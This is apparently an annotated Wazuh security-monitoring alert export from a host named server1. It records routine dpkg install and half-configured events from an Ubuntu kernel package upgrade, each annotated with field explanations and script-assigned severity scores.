Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:06 install linux-image-6.8.0-58-generic:amd64 6.8.0-58.60+1
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  install
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-image-6.8.0-58-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) requested to install.

🧠 What happened? New dpkg (Debian Package) requested to install.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:23:08.250+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:08.250+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) requested to install.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2901
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533388.23610
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:07 install linux-modules-extra-6.8.0-58-generic:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  install
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-modules-extra-6.8.0-58-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:12.254+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:12.254+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533392.24064
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:10 status half-configured linux-generic:amd64 6.8.0-57.59
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-57.59
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:12.254+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:12.254+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  10
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533392.24549
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:11 status half-configured linux-image-generic:amd64 6.8.0-57.59
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-image-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-57.59
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) requested to install.

🧠 What happened? New dpkg (Debian Package) requested to install.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:23:12.254+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:12.254+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) requested to install.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2901
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533392.25046
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:11 install linux-headers-6.8.0-58:all 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  install
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-headers-6.8.0-58
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  all
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) requested to install.

🧠 What happened? New dpkg (Debian Package) requested to install.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:20.267+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:20.267+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) requested to install.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2901
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533400.25468
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:19 install linux-headers-6.8.0-58-generic:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  install
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-headers-6.8.0-58-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:24.272+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:24.272+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  11
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533404.25910
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:22 status half-configured linux-headers-generic:amd64 6.8.0-57.59
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-headers-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-57.59
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) requested to install.

🧠 What happened? New dpkg (Debian Package) requested to install.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:24.273+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:24.273+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) requested to install.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2901
Numeric ID of the detection rule that fired.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533404.26411
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:22 install linux-tools-6.8.0-58:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  install
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-tools-6.8.0-58
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) requested to install.

🧠 What happened? New dpkg (Debian Package) requested to install.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:24.274+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:24.274+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) requested to install.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2901
Numeric ID of the detection rule that fired.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533404.26833
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:23 install linux-tools-6.8.0-58-generic:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  install
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-tools-6.8.0-58-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:24.274+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:24.274+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  12
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533404.27271
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:23 status half-configured linux-modules-6.8.0-58-generic:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-modules-6.8.0-58-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-58.60
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) installed.

🧠 What happened? New dpkg (Debian Package) installed.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:30.302+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:30.302+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) installed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2902
Numeric ID of the detection rule that fired.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533410.27790
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:30 status installed linux-modules-6.8.0-58-generic:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status installed
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-modules-6.8.0-58-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-58.60
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:30.303+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:30.303+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  13
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
